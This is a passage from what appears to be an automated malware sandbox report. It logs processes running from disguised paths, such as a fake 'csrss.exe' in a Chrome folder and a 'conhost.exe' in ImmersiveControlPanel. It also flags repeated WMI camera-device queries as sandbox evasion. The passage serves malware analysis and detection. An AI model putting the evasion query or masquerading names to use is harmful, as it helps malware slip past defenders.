                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
